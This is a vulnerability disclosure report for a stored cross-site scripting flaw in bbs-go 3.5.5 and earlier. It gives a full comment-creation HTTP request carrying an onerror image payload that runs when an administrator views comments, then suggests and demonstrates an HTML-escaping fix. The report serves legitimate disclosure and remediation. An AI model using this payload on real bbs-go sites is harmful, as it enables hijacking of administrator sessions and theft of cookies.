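Vulnerability name
bbs-go stored cross-site scripting vulnerability

Affected version
bbs-go <= 3.5.5

Vulnerability type
Stored cross-site scripting

Severity
High

Description
bbs-go is an open-source community system built in Go with a decoupled front end and back end: Go provides the API that serves the data, the user interface is rendered with Nuxt.js, and the admin interface is based on element-ui.
bbs-go has a stored cross-site scripting vulnerability, which stems from the program not correctly handling input from users. After registering, a user can inject a malicious JavaScript script in an article comment. The malicious script is triggered when an administrator clicks to view the comments under Content Management - Article Management in the admin console, leading to disclosure of cookies and other information.
The following products and versions are affected: bbs-go <= 3.5.5
bbs-go download address: https://github.com/mlogclub/bbs-go

Verification
Precondition: a registered, logged-in user
Steps:
Full request:

```
POST /api/comment/create HTTP/1.1
Host: 192.168.111.130:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Client: bbs-go-site
X-User-Token: 1c1c47cb70f447589944117cb339518b
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://192.168.111.130:3000
Connection: close
Referer: http://192.168.111.130:3000/article/4
Cookie: Hm_lvt_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm_lpvt_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b

entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId=
```

7. Log in to the admin console with the administrator account admin/123456, click Content Management - Article Management, select this article, and view the comments.

The XSS is triggered.

Fix suggestion
`bbs-go\server\controllers\admin\comment_controller.go:71`
Change it to `builder.Put("content", html.EscapeString(comment.Content))`
HTML entity encoding `comment.Content` temporarily resolves this vulnerability.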
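The effect of the suggested fix, as an added Go example that is not bbs-go code and not part of the report: it decodes the form body from the request above and compares what the admin page receives with and without `html.EscapeString`. `storedContent` and `adminView` are hypothetical names, and modelling the admin API response with `encoding/json` is an assumption.

```go
package main

import (
	"encoding/json"
	"fmt"
	"html"
	"net/url"
)

// Form body copied from the request in the report above.
const reportedBody = "entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId="

// storedContent decodes the form and returns the comment text as it would be stored.
func storedContent(body string) (string, error) {
	form, err := url.ParseQuery(body)
	if err != nil {
		return "", err
	}
	return form.Get("content"), nil
}

// adminView is a hypothetical stand-in for the admin comment response: it JSON-encodes
// the content, decodes it as a browser client would, and returns what the page receives.
func adminView(content string, escape bool) (string, error) {
	if escape {
		content = html.EscapeString(content) // the change suggested in the report
	}
	wire, err := json.Marshal(map[string]string{"content": content})
	if err != nil {
		return "", err
	}
	var got map[string]string
	err = json.Unmarshal(wire, &got)
	return got["content"], err
}

func main() {
	c, err := storedContent(reportedBody)
	if err != nil {
		panic(err)
	}
	for _, escape := range []bool{false, true} {
		v, err := adminView(c, escape)
		if err != nil {
			panic(err)
		}
		fmt.Printf("escape=%-5v admin page receives %q\n", escape, v)
	}
}
```

Go's `encoding/json` writes `<` as `\u003c` on the wire, but the client's JSON parser restores it, so JSON encoding alone does not neutralise the markup. Only the entity-encoded value reaches the page as inert text.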
Can this issue be reproduced in the latest version?